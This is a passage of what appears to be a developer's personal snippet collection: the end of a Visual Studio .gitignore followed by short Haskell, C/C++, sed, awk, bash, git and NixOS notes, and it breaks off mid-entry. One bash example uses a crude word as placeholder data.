*.tmp_proj | |
*_wpftmp.csproj | |
*.log | |
*.vspscc | |
*.vssscc | |
.builds | |
*.pidb | |
*.svclog | |
*.scc | |
# Chutzpah Test files | |
_Chutzpah* | |
# Visual C++ cache files | |
ipch/ | |
*.aps | |
*.ncb | |
*.opendb | |
*.opensdf | |
*.sdf | |
*.cachefile | |
*.VC.db | |
*.VC.VC.opendb | |
# Visual Studio profiler | |
*.psess | |
*.vsp | |
*.vspx | |
*.sap | |
# Visual Studio Trace Files | |
*.e2e | |
# TFS 2012 Local Workspace | |
$tf/ | |
# Guidance Automation Toolkit | |
*.gpState | |
# ReSharper is a .NET coding add-in | |
_ReSharper*/ | |
*.[Rr]e[Ss]harper | |
*.DotSettings.user | |
# JustCode is a .NET coding add-in | |
.JustCode | |
# TeamCity is a build add-in | |
_TeamCity* | |
# DotCover is a Code Coverage Tool | |
*.dotCover | |
# AxoCover is a Code Coverage Tool | |
.axoCover/* | |
!.axoCover/settings.json | |
# Visual Studio code coverage results | |
*.coverage | |
*.coveragexml | |
# NCrunch | |
_NCrunch_* | |
.*crunch*.local.xml | |
nCrunchTemp_* | |
# MightyMoose | |
*.mm.* | |
AutoTest.Net/ | |
# Web workbench (sass) | |
.sass-cache/ | |
# Installshield output folder | |
[Ee]xpress/ | |
# DocProject is a documentation generator add-in | |
DocProject/buildhelp/ | |
DocProject/Help/*.HxT | |
DocProject/Help/*.HxC | |
DocProject/Help/*.hhc | |
DocProject/Help/*.hhk | |
DocProject/Help/*.hhp | |
DocProject/Help/Html2 | |
DocProject/Help/html | |
# Click-Once directory | |
publish/ | |
# Publish Web Output | |
*.[Pp]ublish.xml | |
*.azurePubxml | |
# Note: Comment the next line if you want to checkin your web deploy settings, | |
# but database connection strings (with potential passwords) will be unencrypted | |
*.pubxml | |
*.publishproj | |
# Microsoft Azure Web App publish settings. Comment the next line if you want to | |
# checkin your Azure Web App publish settings, but sensitive information contained | |
# in these scripts will be unencrypted | |
PublishScripts/ | |
# NuGet Packages | |
*.nupkg | |
# The packages folder can be ignored because of Package Restore | |
**/[Pp]ackages/* | |
# except build/, which is used as an MSBuild target. | |
!**/[Pp]ackages/build/ | |
# Uncomment if necessary however generally it will be regenerated when needed | |
#!**/[Pp]ackages/repositories.config | |
# NuGet v3's project.json files produces more ignorable files | |
*.nuget.props | |
*.nuget.targets | |
# Microsoft Azure Build Output | |
csx/ | |
*.build.csdef | |
# Microsoft Azure Emulator | |
ecf/ | |
rcf/ | |
# Windows Store app package directories and files | |
AppPackages/ | |
BundleArtifacts/ | |
Package.StoreAssociation.xml | |
_pkginfo.txt | |
*.appx | |
# Visual Studio cache files | |
# files ending in .cache can be ignored | |
*.[Cc]ache | |
# but keep track of directories ending in .cache | |
!*.[Cc]ache/ | |
# Others | |
ClientBin/ | |
~$* | |
*~ | |
*.dbmdl | |
*.dbproj.schemaview | |
*.jfm | |
*.pfx | |
*.publishsettings | |
orleans.codegen.cs | |
# Including strong name files can present a security risk | |
# (https://github.com/github/gitignore/pull/2483#issue-259490424) | |
#*.snk | |
# Since there are multiple workflows, uncomment next line to ignore bower_components | |
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) | |
#bower_components/ | |
# RIA/Silverlight projects | |
Generated_Code/ | |
# Backup & report files from converting an old project file | |
# to a newer Visual Studio version. Backup files are not needed, | |
# because we have git ;-) | |
_UpgradeReport_Files/ | |
Backup*/ | |
UpgradeLog*.XML | |
UpgradeLog*.htm | |
ServiceFabricBackup/ | |
*.rptproj.bak | |
# SQL Server files | |
*.mdf | |
*.ldf | |
*.ndf | |
# Business Intelligence projects | |
*.rdl.data | |
*.bim.layout | |
*.bim_*.settings | |
*.rptproj.rsuser | |
# Microsoft Fakes | |
FakesAssemblies/ | |
# GhostDoc plugin setting file | |
*.GhostDoc.xml | |
# Node.js Tools for Visual Studio | |
.ntvs_analysis.dat | |
node_modules/ | |
# Visual Studio 6 build log | |
*.plg | |
# Visual Studio 6 workspace options file | |
*.opt | |
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.) | |
*.vbw | |
# Visual Studio LightSwitch build output | |
**/*.HTMLClient/GeneratedArtifacts | |
**/*.DesktopClient/GeneratedArtifacts | |
**/*.DesktopClient/ModelManifest.xml | |
**/*.Server/GeneratedArtifacts | |
**/*.Server/ModelManifest.xml | |
_Pvt_Extensions | |
# Paket dependency manager | |
.paket/paket.exe | |
paket-files/ | |
# FAKE - F# Make | |
.fake/ | |
# JetBrains Rider | |
.idea/ | |
*.sln.iml | |
# CodeRush personal settings | |
.cr/personal | |
# Python Tools for Visual Studio (PTVS) | |
__pycache__/ | |
*.pyc | |
# Cake - Uncomment if you are using it | |
# tools/** | |
# !tools/packages.config | |
# Tabs Studio | |
*.tss | |
# Telerik's JustMock configuration file | |
*.jmconfig | |
# BizTalk build output | |
*.btp.cs | |
*.btm.cs | |
*.odx.cs | |
*.xsd.cs | |
# OpenCover UI analysis results | |
OpenCover/ | |
# Azure Stream Analytics local run output | |
ASALocalRun/ | |
# MSBuild Binary and Structured Log | |
*.binlog | |
# NVidia Nsight GPU debugger configuration file | |
*.nvuser | |
# MFractors (Xamarin productivity tool) working folder | |
.mfractor/ | |
# Local History for Visual Studio | |
.localhistory/ | |
--------------------------------- | |
[git: discard local commits] | |
git reset --hard @{u} | |
--------------------------------- | |
[haskell align bytes by 4] | |
align4 n | n `mod` 4 == 0 = n | otherwise = align4 $ n + 1 | |
--------------------------------- | |
[haskell my sorter] | |
sorter n xs | null xs = n:[] | n < head xs = n:xs | otherwise = (head xs):sorter n (tail xs)
--------------------------------- | |
[go get howto] | |
go get github.com/natefinch/npipe | |
--------------------------------- | |
[haskell ternary] | |
main = undefined | |
data Cond a = a :? a | |
infixl 0 ? | |
infixl 1 :? | |
(?) :: Bool -> Cond a -> a | |
True ? (x :? _) = x | |
False ? (_ :? x) = x | |
--------------------------------- | |
[haskell function composition] | |
{- | |
Function Composition: | |
1) 3 is feed into h (not 3 and 7) | |
2) The result of `h 3` is a function | |
3) The result function and the next parameter 7 become inputs to g | |
4) g does its thing | |
conclusion: function composition requires carefully crafted | |
function-type to the left of `.` such that whatever is the | |
return value to its right is input to its left. | |
Function composition operates on single parameter passing | |
But I don't understand why `e` works but not `d` | |
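(My later note, best guess: (e.g.h) 3 7 is ((e.g.h) 3) 7 = (e (g (h 3))) 7.
h 3 and g (h 3) are still functions; e = id just passes the function through, so
the trailing 7 gets applied to it and everything type-checks. d instead tries to
compute g (h 3) + 1, which needs a Num instance for functions, hence the type error.)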
-} | |
d n = n+1 | |
e n = n | |
g f p = f p | |
h a b = a + b | |
main = do | |
let ans = (e.g.h) 3 7 | |
putStrLn $ "result = " ++ show ans | |
--------------------------------- | |
[haskell:inc_x my first art] | |
-- original construct | |
inc_x' acc e = | |
[ if fst e == fst q then (fst q,1 + (snd q)) else q | | |
q <- acc ] | |
-- a week later | |
inc_x acc (x,_) = | |
[ (p,q) | | |
(a,b) <- acc, | |
let (p,q) | |
| a == x = (a,b+1) | |
| otherwise = (a,b) ] | |
--------------------------------- | |
[c++ unbuffered cout] | |
#include <cstdio>
#include <iostream>
#include <thread>
#include <chrono>
int main () { | |
#if N==1 | |
std::setbuf (stdout,nullptr); // this | |
#elif N==2 | |
char buf[3]; | |
std::setbuf (stdout,buf); | |
#elif N==3 | |
std::setvbuf (stdout,nullptr,_IONBF,0); // or this | |
#else | |
char buf[3]; | |
std::setvbuf (stdout,buf,_IOFBF,3); | |
#endif | |
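// my note: with -DN=1 or -DN=3 stdout is unbuffered, so one '*' appears per second
// rather than only whenever the stdio buffer happens to flush.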
for (int i = 0;i < 10; i++) { | |
std::this_thread::sleep_for (std::chrono::seconds(1)); | |
std::cout << "*"; | |
} | |
} | |
--------------------------------- | |
[python yaml to json] | |
python3 -c 'import sys,yaml,json; json.dump(yaml.load(sys.stdin),sys.stdout,indent=4)' < input.iml | |
--------------------------------- | |
[win32 concept map] | |
File Mapping Object: | |
url: https://docs.microsoft.com/en-us/windows/desktop/Memory/file-mapping | |
api: | |
- CreateFile | |
- CreateFileMapping | |
- MapViewOfFile | |
- UnmapViewOfFile | |
- GetLastError | |
- GetSystemInfo | |
- CloseHandle | |
- FlushViewOfFile | |
- VirtualProtect | |
struct: [SYSTEM_INFO] | |
errorcode: [NO_ERROR,ERROR_ALREADY_EXISTS,ERROR_FILE_INVALID] | |
flag: [GENERIC_READ,GENERIC_WRITE,PAGE_READWRITE] | |
param: [dwMaximumSizeHigh,dwMaximumSizeLow] | |
constraint: | |
- offset is multiple of file allocation granularity | |
notion: | |
- This 'file mapping object' is the size of the portion of the 'file' you want to view plus the offset into the 'file'. | |
- The 'file mapping object' can consist of all or only part of the 'file'. | |
- A 'file view' can consist of all or only part of the 'file mapping object'. | |
- A 'file view' must start at an offset into the file that is a multiple of the 'file allocation granularity'. | |
- A 'process' manipulates the 'file' through the 'file view'. | |
- When multiple 'processes' use the same 'file mapping object' to create 'views' for a local 'file', the data is coherent. | |
- To map the data from a 'file' to the 'virtual memory' of a 'process', you must create a 'view' of the 'file'. | |
- A file view size must be smaller than the file mapping object size. | |
- Multiple processes can also use memory-mapped files to share data. | |
- Misinvariance shall cause CreateFileMapping to fail | |
formula: | |
- dwFileMapStart = (FILE_MAP_START / dwSysGran) * dwSysGran; | |
- dwMapViewSize = (FILE_MAP_START % dwSysGran) + BUFFSIZE; | |
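A minimal C sketch (my own example, not from the original notes; "test.dat", FILE_MAP_START and BUFFSIZE are made-up values) tying the api list and the two formulas above together:
#include <windows.h>
#include <stdio.h>
#define FILE_MAP_START 138240
#define BUFFSIZE       512
int main(void)
{
    SYSTEM_INFO si;
    GetSystemInfo(&si);
    DWORD dwSysGran      = si.dwAllocationGranularity;
    DWORD dwFileMapStart = (FILE_MAP_START / dwSysGran) * dwSysGran;  /* offset rounded down to granularity */
    DWORD dwMapViewSize  = (FILE_MAP_START % dwSysGran) + BUFFSIZE;   /* view covers the slack plus the data */
    HANDLE hFile = CreateFileA("test.dat", GENERIC_READ | GENERIC_WRITE, 0, NULL,
                               OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) { printf("CreateFile: %lu\n", GetLastError()); return 1; }
    /* dwMaximumSizeHigh = dwMaximumSizeLow = 0 means "use the current file size" */
    HANDLE hMap = CreateFileMappingA(hFile, NULL, PAGE_READWRITE, 0, 0, NULL);
    if (hMap == NULL) { printf("CreateFileMapping: %lu\n", GetLastError()); CloseHandle(hFile); return 1; }
    char *pView = (char *)MapViewOfFile(hMap, FILE_MAP_ALL_ACCESS, 0, dwFileMapStart, dwMapViewSize);
    if (pView != NULL) {
        char *pData = pView + (FILE_MAP_START - dwFileMapStart);  /* the byte we actually wanted */
        printf("byte at offset %d: 0x%02x\n", FILE_MAP_START, (unsigned)(unsigned char)*pData);
        UnmapViewOfFile(pView);
    } else {
        printf("MapViewOfFile: %lu\n", GetLastError());
    }
    CloseHandle(hMap);
    CloseHandle(hFile);
    return 0;
}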
--------------------------------- | |
[g++ include paths] | |
g++ -E -Wp,-v -xc++ /dev/null | |
--------------------------------- | |
[gcc include paths] | |
gcc -E -Wp,-v -xc /dev/null | |
--------------------------------- | |
[add memset] | |
include: | |
c: | |
memcpy: string.h | |
memset: string.h | |
lseek: [sys/types.h,unistd.h] | |
printf: stdio.h | |
realloc: stdlib.h | |
assert: assert.h | |
c++: | |
cout: iostream | |
--------------------------------- | |
[improving myconio with portable kbhit] | |
#include <termios.h> | |
#include <unistd.h> | |
#include <stdio.h> | |
#include <sys/ioctl.h> | |
#include <sys/select.h> | |
/* Generate object file: gcc -c myconio.c | |
* In your C++ code, declare functions as: | |
* | |
* extern "C" { | |
* int getch (void); | |
* int getche (void); | |
* int _kbhit (void); | |
* } | |
* | |
* g++ -o yourapp yourapp.cpp myconio.o | |
* | |
* You can also combine several *.o into a *.a | |
* ar rcs myconio.a myconio.o helpers.o | |
* | |
* And statically linked the same with: | |
* g++ -o yourapp yourapp.cpp myconio.a | |
* | |
* Or create a dynamic library by: | |
* gcc -shared myconio.o -o myconio.dll | |
* # note: In cygwin, it must be in dll suffix! | |
* g++ -o win win.cpp -L./ -lmyconio | |
* | |
* Of course, the app and the dll must be beside | |
* each other or use PATH (LD_LIBRARY_PATH not | |
* honored here in cygwin). | |
* | |
* References: | |
* - https://stackoverflow.com/questions/29335758/using-kbhit-and-getch-on-linux | |
*/ | |
/* reads from keypress, doesn't echo */ | |
int getch(void) | |
{ | |
struct termios oldattr, newattr; | |
int ch; | |
tcgetattr( STDIN_FILENO, &oldattr ); | |
newattr = oldattr; | |
newattr.c_lflag &= ~( ICANON | ECHO ); | |
tcsetattr( STDIN_FILENO, TCSANOW, &newattr ); | |
ch = getchar(); | |
tcsetattr( STDIN_FILENO, TCSANOW, &oldattr ); | |
return ch; | |
} | |
/* reads from keypress, echoes */ | |
int getche(void) | |
{ | |
struct termios oldattr, newattr; | |
int ch; | |
tcgetattr( STDIN_FILENO, &oldattr ); | |
newattr = oldattr; | |
newattr.c_lflag &= ~( ICANON ); | |
tcsetattr( STDIN_FILENO, TCSANOW, &newattr ); | |
ch = getchar(); | |
tcsetattr( STDIN_FILENO, TCSANOW, &oldattr ); | |
return ch; | |
} | |
/* http://www.flipcode.com/archives/_kbhit_for_Linux.shtml */ | |
int more_portable() { | |
struct timeval timeout; | |
fd_set rdset; | |
FD_ZERO(&rdset); | |
FD_SET(STDIN_FILENO, &rdset); | |
timeout.tv_sec = 0; | |
timeout.tv_usec = 0; | |
return select(STDIN_FILENO + 1, &rdset, NULL, NULL, &timeout); /* nfds is highest fd + 1 */
} | |
int _kbhit(void) { | |
static int initialized = 0; | |
if (! initialized) { | |
// Use termios to turn off line buffering | |
struct termios term; | |
tcgetattr(STDIN_FILENO, &term); | |
term.c_lflag &= ~ICANON; | |
tcsetattr(STDIN_FILENO, TCSANOW, &term); | |
setbuf(stdin, NULL); | |
initialized = 1; | |
} | |
#if 0 | |
int bytesWaiting; | |
ioctl(STDIN_FILENO, FIONREAD, &bytesWaiting); | |
return bytesWaiting; | |
#else | |
return more_portable(); | |
#endif | |
} | |
--------------------------------- | |
[haskell gadts] | |
{-# LANGUAGE GADTs #-} | |
import Prelude hiding (Word) | |
main = undefined | |
data Term a where | |
Word::String -> Term Integer | |
Equals::(Eq a) => Term a -> Term a -> Term Bool | |
Plus::Term Integer -> Term Integer -> Term Integer | |
--------------------------------- | |
[haskell nesting where clauses] | |
-- how to nest where clauses | |
f = a | |
where | |
a = b | |
where b = 3 | |
g = a | |
where a = b | |
where b = 3 | |
--------------------------------- | |
[fsnotify duplicate events] | |
[0 dx@t440:~/src/fp] | |
$ filemon | |
2018/11/02 12:46:42 event: "/home/dx/src/fp/.nadia.hs.swp": WRITE | |
2018/11/02 12:46:42 modified file: /home/dx/src/fp/.nadia.hs.swp | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/4913": REMOVE | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/nadia.hs": RENAME | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/nadia.hs~": CREATE | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/.nadia.hs.swp": WRITE | |
2018/11/02 12:46:48 modified file: /home/dx/src/fp/.nadia.hs.swp | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/nadia.hs": CREATE | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/nadia.hs": WRITE | |
2018/11/02 12:46:48 modified file: /home/dx/src/fp/nadia.hs | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/nadia.hs": CHMOD | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/.nadia.hs.swp": WRITE | |
2018/11/02 12:46:48 modified file: /home/dx/src/fp/.nadia.hs.swp | |
2018/11/02 12:46:48 event: "/home/dx/src/fp/nadia.hs~": REMOVE | |
2018/11/02 12:46:52 event: "/home/dx/src/fp/.nadia.hs.swp": WRITE | |
2018/11/02 12:46:52 modified file: /home/dx/src/fp/.nadia.hs.swp | |
^C | |
[130 dx@t440:~/src/fp] | |
$ | |
--------------------------------- | |
[golang tips] | |
go get github.com/fsnotify/fsnotify | |
# For Windows cygwin environment, just launch `git bash` and do the `go get` from there | |
- go get -v github.com/bronze1man/yaml2json/y2jLib | |
- cd $GOPATH/src/github.com/bronze1man/ | |
- go build | |
- go install | |
- make sure $GOPATH/bin is in your $PATH | |
- You can now use yaml2json.exe | |
--------------------------------- | |
[c++ is not a superset of c anymore]
int main() { | |
int e = 1, a = 2, b = 3, c = 4, d = 5; | |
e = a ? b : c = d; | |
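// my note: C++ parses this as a ? b : (c = d); C parses it as (a ? b : c) = d,
// and since C's ?: result is not an lvalue, a C compiler rejects the line.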
return e; | |
} | |
--------------------------------- | |
[c++ unique_ptr] | |
#include <iostream> | |
#include <memory> | |
class Node { | |
public: | |
Node() {std::cout << "conx";} | |
~Node() {std::cout << "destx";} | |
}; | |
int main (int argc, char *argv[]) | |
{ | |
std::unique_ptr<Node> p(new Node); | |
//Node*p = new Node; | |
return 0; | |
} | |
--------------------------------- | |
[c++ thread] | |
#include <iostream> | |
#include <thread> | |
#include <future> | |
#include <chrono> | |
void f(std::string s,int delay) | |
{ | |
std::cout << "from: " << s << delay << std::endl; | |
std::this_thread::sleep_for(std::chrono::seconds(delay)); | |
} | |
int threadFunc (int a,int b) | |
{ | |
while (true) { | |
f("threadFunc",1); | |
} | |
} | |
int main (int argc, char *argv[]) | |
{ | |
std::thread t (threadFunc,3,5); | |
std::string input; | |
int n; | |
while (true) { | |
std::cout << "INPUT?\n"; | |
std::getline(std::cin,input); | |
n = atoi(input.c_str()); | |
f("main",n); | |
} | |
std::cout << "****\n"; | |
t.join(); | |
return 0; | |
} | |
--------------------------------- | |
[how to sync a cloned nixpkgs' master and release-18.09 branches from upstream]
https://asciinema.org/a/lv9v5mh1GGQJsfKIzUSlzsg7i | |
--------------------------------- | |
[git sync nixpkgs repo] | |
? git remote update channels | |
? git rebase channels/nixos-18.09 | |
- git clone git://github.com/NixOS/nixpkgs.git | |
- nixos-rebuild switch -I nixpkgs=/path/to/my/nixpkgs | |
Nixos Sequence: | |
- git clone ssh://[email protected]/truthadjustr/nixpkgs.git | |
- git remote add upstream https://github.com/NixOS/nixpkgs.git | |
? git remote add channels https://github.com/NixOS/nixpkgs-channels.git | |
? git remote update channels | |
- git fetch upstream | |
- git checkout master | |
- git merge upstream/master | |
- git push -u origin master | |
- git checkout --track origin/release-18.09 | |
- git merge upstream/release-18.09 | |
- git push -u origin release-18.09 | |
----------------------- | |
My git sequence to sync my nixpgks clone: | |
1.) git checkout master | |
2.) git fetch upstream | |
3.) git merge upstream/master | |
4.) git push | |
5.) git checkout release-18.09 | |
6.) git merge upstream/release-18.09 | |
7.) git push | |
8.) git remote update channels | |
--------------------------------- | |
[shell if-else inside Makefile] | |
nothing: | |
@echo | |
action: | |
@echo "you passed: ${ARGS}" | |
@if [[ "${ARGS}" = "apple" ]];then \ | |
echo "red";\ | |
else \ | |
echo "yellow";\ | |
fi; | |
--------------------------------- | |
[git sequence] | |
? git remote update channels | |
? git rebase channels/nixos-18.09 | |
- git clone git://github.com/NixOS/nixpkgs.git | |
- nixos-rebuild switch -I nixpkgs=/path/to/my/nixpkgs | |
Nixos Sequence: | |
- git clone ssh://[email protected]/truthadjustr/nixpkgs.git | |
- git remote add upstream https://github.com/NixOS/nixpkgs.git | |
? git remote add channels https://github.com/NixOS/nixpkgs-channels.git | |
? git remote update channels | |
- git fetch upstream | |
- git checkout master | |
- git merge upstream/master | |
- git push -u origin master | |
- git checkout --track origin/release-18.09 | |
- git merge upstream/release-18.09 | |
- git push -u origin release-18.09 | |
--------------------------------- | |
[how to get even with nixos master and release-18.09 in your fork] | |
https://asciinema.org/a/VRKXqNMG2C7dtCgxPbyfdV2qX | |
--------------------------------- | |
[nixos channels vs release?] | |
https://asciinema.org/a/nTTbvSj9subD02JqbBQfoYu9t | |
--------------------------------- | |
[nixos master sync] | |
https://asciinema.org/a/5IfSruL3gbIgTgULHzSZuoS9t | |
--------------------------------- | |
[nixos keep up-to-date] | |
https://asciinema.org/a/U2wGcQi8yS3tolnFtZhK38SBW | |
--------------------------------- | |
[sed add in groups of 3] | |
sed -n '$!N;$!N;s/\n/+/g;$!p;${s/\n/+/g;p}' input | |
--------------------------------- | |
[sed in groups of 3] | |
sed -n '$!{N};$!{N};$!{s/\n/+/g;p};${s/\n/+/g;p}' input.txt | |
--------------------------------- | |
[sed tricks (secret)] | |
sed '/Administration/{s/Administration/Supervision/;:loop n;b loop}' thegeekstuff.txt | |
sed 's/^ */&\n/;:loop s/^\n//;s/ \n/\n+/;t loop' thegeekstuff.txt | |
echo 1234 | sed ':loop s/\(.*[0-9]\)\([0-9]\{3\}\)/\1,\2/;t loop' | |
sed ':loop /\\$/N;s/\\\n */ /;t loop' thegeekstuff2.txt | |
sed '/</{:loop s/<[^<]*>//g;/</{N;b loop}}' index.html | |
sed ':loop $!{N;b loop};s/".*"//g' thegeekstuff.txt | |
sed -n '1!G;h;$p' nums.txt | |
--------------------------------- | |
[tac by sed] | |
"sed -n '1!G;h;' nums.txt" | |
--------------------------------- | |
[sed is devious] | |
"sed -n ':loop H;!b loop;${x;p}' nums.txt" | |
--------------------------------- | |
[sed lesson 2] | |
sed -e ':loop $!{N;/\n$/!b loop};s/"[^"]*"//g' thegeekstuff.txt | |
--------------------------------- | |
[sed lesson1] | |
sed '/Administration/{s/Administration/Supervision/;:loop n;b loop}' thegeekstuff.txt | |
--------------------------------- | |
[sed wisdom] | |
echo 'aa bb cc dd' | sed ':label s/ /+/;t label' | |
--------------------------------- | |
[nix-shell ghc844] | |
nix-shell -I nixpkgs=https://github.com/NixOS/nixpkgs-channels/archive/nixos-unstable.tar.gz -p haskell.compiler.ghc844 | |
--------------------------------- | |
[sed squeeze spaces into a space] | |
sed 's/ \+/ /g' | |
--------------------------------- | |
[bash array gotchas] | |
https://asciinema.org/a/5Z0jIaR20AoPP9HsQWI0hVC5j | |
--------------------------------- | |
[bash printf vs echo on arrays. tsk tsk] | |
tokens=($(ctags -x --c++-kinds=$flags --language-force=c++ --extra=q $ifile | ~/.fk/ctags.awk -v a=1)) | |
#echo ${#tokens[@]} | |
#printf "%s " ${tokens[@]} | |
#echo "${tokens[@]}" | |
if((${#tokens[@]} > 0));then | |
#printf "%s %s " $ifile ${tokens[@]} >> $ofile | |
echo "$ifile ${tokens[@]}" >> $ofile | |
fi | |
--------------------------------- | |
[bash after] | |
#!/run/current-system/sw/bin/bash | |
# | |
[ $# -lt 2 ] && exit 1 | |
ifile=$PWD/${1#"./"} | |
flags=$2 | |
ofile=${3:-/dev/stdout} | |
line="$ifile" | |
while read c;do | |
line="$line "$c | |
done < <(ctags -x --c++-kinds=$flags --language-force=c++ --extra=q $ifile \ | |
| ~/.fk/ctags.awk -v a=1) | |
case "$line" in | |
*\ *) | |
printf "$line\n" >> $ofile | |
;; | |
esac | |
--------------------------------- | |
[bash before] | |
#!/run/current-system/sw/bin/bash | |
# | |
[ $# -lt 2 ] && exit 1 | |
ifile=$PWD/${1#"./"} | |
flags=$2 | |
ofile=${3:-/dev/stdout} | |
printf "$ifile" >> $ofile | |
ctags -x --c++-kinds=$flags --language-force=c++ --extra=q $ifile \ | |
| ~/.fk/ctags.awk -v a=1 | while read c;do | |
printf " $c" >> $ofile | |
done | |
echo >> $ofile | |
sed -i '/ /!d' $ofile 2>/dev/null | |
--------------------------------- | |
[cat tip on how to squeeze blank lines] | |
cat -s | |
--------------------------------- | |
[find trick] | |
find . -type f \( -name '*.h' -o -name '*.cpp' \) -printf '%P\n' | |
--------------------------------- | |
[c++ forward declare] | |
class B; | |
class C {}; | |
class A : public C { | |
B *b; // only pointer can forward declare | |
}; | |
class B { | |
public: | |
B() {} | |
}; | |
int main (int argc,char *argv[]) | |
{ | |
return 0; | |
} | |
--------------------------------- | |
[awk trick] | |
ctags -x --c++-kinds=mv --extra=q ~/tmp/f3.cpp | awk '$2 == "member" && $1 ~/::/ { print $0}' | |
--------------------------------- | |
[sed replace multiple spaces with 1 space] | |
sed -n 's/ \+/ /gp' /tmp/n | |
--------------------------------- | |
[~/.ssh/config for git cli] | |
Host daixtr.github.com | |
HostName github.com | |
IdentityFile ~/.ssh/id_rsa2 | |
User git | |
--------------------------------- | |
[git fetch upstream demo] | |
https://asciinema.org/a/yrxkzXr3KFfidE44K7XbERVdU | |
--------------------------------- | |
[Rigorous way to find where a C++ class is defined] | |
find . -type f \( -name '*.h' -o -name '*.cpp' \) -exec sh -c "ctags -x --c++-kinds=c --language-force=c++ {} | grep -w -n CSmeagol" \; | |
--------------------------------- | |
[awk skipping duplicates based on column] | |
oeuoeu 4 apple | |
o 9 banana | |
xxxx 4 ALREADY DUPLICATE | |
yyyyyyy 3 this is a test | |
ouuuuuuuuuuu 9 ALREADY DUPLICATE | |
ataya 4 this is ALREADY DUPLICATE | |
awk '!seen[$2]++' /tmp/record | |
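# my note: !seen[$2]++ is true only the first time a given 2nd-column value appears, so later duplicates are skipped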
--------------------------------- | |
[nix-shell --pure] | |
https://asciinema.org/a/fkm2V5Qqxpjizq2N27T5zo4aL | |
--------------------------------- | |
[python lambda in list comprehension] | |
a = ['one 1', 'two 2', 'three 3'] | |
b = [(lambda a,b:(a,b))(*x.split()) for x in a] | |
print(b) | |
c = [('one',1), ('two', 2), ('three', 3)] | |
k = [(lambda p,q:p + " => " + str(q))(x,y) for (x,y) in c] | |
print(k) | |
--------------------------------- | |
[python elasticsearch indices] | |
from elasticsearch import Elasticsearch | |
import json,time,requests | |
es = Elasticsearch(host='elastic-local-node') | |
# curl "http://$ES:9200/_cat/indices?v&h=index,docs.count&s=docs.count:desc" | |
url = "http://elastic-local-node:9200/_cat/indices" | |
res = requests.get("http://elastic-local-node:9200/_cat/indices?v&h=index,docs.count&s=docs.count:desc") | |
if res.headers['content-type'] == 'text/plain; charset=UTF-8': | |
indices_ = filter(lambda x: not x.startswith('.') ,res.text.split('\n')) | |
indices = [(e.split()[0],e.split()[1]) for e in indices_ if len(e.split()) == 2] | |
for index in indices[1:]: | |
print(index) | |
else: | |
print("print res.json() instead?") | |
#for index in es.indices.get('*') | |
# print(index) | |
--------------------------------- | |
[jq tips] | |
jq '.' ~/es_response.json | |
# or | |
jq '.hits.total' ~/es_response.json | |
jq '.hits.hits|length' ~/es_response.json | |
jq '.hits.hits[3]' ~/es_response.json | |
# Use double quotes when the field name contains a special symbol like @
jq '.hits.hits[]._source."@timestamp"' response.json | |
--------------------------------- | |
[jq howto] | |
jq < ~/es_response.json '.hits.total' | |
# or | |
jq '.hits.total' ~/es_response.json | |
--------------------------------- | |
[python3 pip upgrade] | |
python3 -m pip install --upgrade pip | |
--------------------------------- | |
[using python3's built-in pip] | |
python3 -m pip install elasticsearch | |
--------------------------------- | |
[cscope] | |
cscope -RCbk | |
--------------------------------- | |
[haskell append] | |
append xa xb | |
| xa == [] = xb | |
| xb == [] = xa | |
| otherwise = p:append q xb | |
where | |
p = head xa | |
q = tail xa | |
--------------------------------- | |
[haskell prompt config ~/.ghci] | |
:set prompt "\ESC[0;34m\STX%s\n\ESC[1;31m\STXλ> \ESC[m\STX" | |
--------------------------------- | |
[haskell ~/.ghci config 2] | |
:set prompt "\x03BB> " | |
--------------------------------- | |
[haskell ~/.ghci config] | |
:set prompt "\ESC[1;31mλ> \ESC[m" | |
--------------------------------- | |
[haskell makeSet first blood] | |
makeSet xs = foldl (\x y -> if y `elem` x then x else y:x) [] xs | |
makeSet2 acc [] = acc | |
makeSet2 acc (x:xs) | |
| x `elem` acc = makeSet2 acc xs | |
| otherwise = makeSet2 (x:acc) xs | |
--------------------------------- | |
[decimal to binary convert in bc] | |
echo 'obase=2;5'|bc | |
--------------------------------- | |
[bc floating point divide] | |
echo '5/2'|bc -l | |
--------------------------------- | |
[another way: grep succeeds if it finds a tab]
grep $'\t' /tmp/telepathy.sh | |
--------------------------------- | |
[grep succeeds if it finds a tab]
grep -P '\t' /tmp/telepathy.sh | |
--------------------------------- | |
[bash string split] | |
s="cunt 7";arr=(${s// / });# arr[0] = cunt, arr[1] = 7 | |
--------------------------------- | |
[feed lines into while loop, skipping blank and commented] | |
while read x;do echo $x;done < <(grep -v -E '^#|^$|^[[:space:]]' proj.lst) | |
--------------------------------- | |
[grep skip empty lines] | |
grep -v -E '^#|^$|^[[:space:]]' /tmp/fc | |
--------------------------------- | |
[sed remove spaces before dollar] | |
sed 's/.*$/$/' /tmp/xxxxx | |
--------------------------------- | |
[ampersand inside xml] | |
<!-- how to encode ampersand inside xml --> | |
<a>&amp;</a>
--------------------------------- | |
[xml format] | |
xml fo -s 4 /tmp/n | |
--------------------------------- | |
[extract file extension in bash] | |
h='/aaa/bbb/file.c';echo ${h##*.} | |
--------------------------------- | |
[bash check file zero size] | |
[ -s /tmp/a1 ] && echo "notempty" || echo "empty" | |
--------------------------------- | |
[sed remove trailing spaces] | |
sed -i 's/[[:blank:]]*$//' | |
--------------------------------- | |
[useful find command (excludes, content-only delete)] | |
# Useful `find` commands: | |
find . \( -path ./dir1 -o -path ./.git \) -prune -o -type d \( -name Debug -o -name Release \) -exec rm -rf {} \; | |
find Lib/ -type d \( -name Debug -o -name Release \) -exec sh -c 'rm -rf {}/*' \; | |
--------------------------------- | |
[xmlstarlet search multiple xpaths] | |
showsrc is a function | |
showsrc () | |
{ | |
[ $# -eq 0 ] && return 1; | |
local F=$1; | |
xml sel -N x="http://schemas.microsoft.com/developer/msbuild/2003" -t -m //x:ClCompile/@Include -v . -n -m //x:ClInclude/@Include -v . -n $F | sort | uniq -ic | sort -rn | |
} | |
--------------------------------- | |
[haskell armature] | |
{- Expected behavior: | |
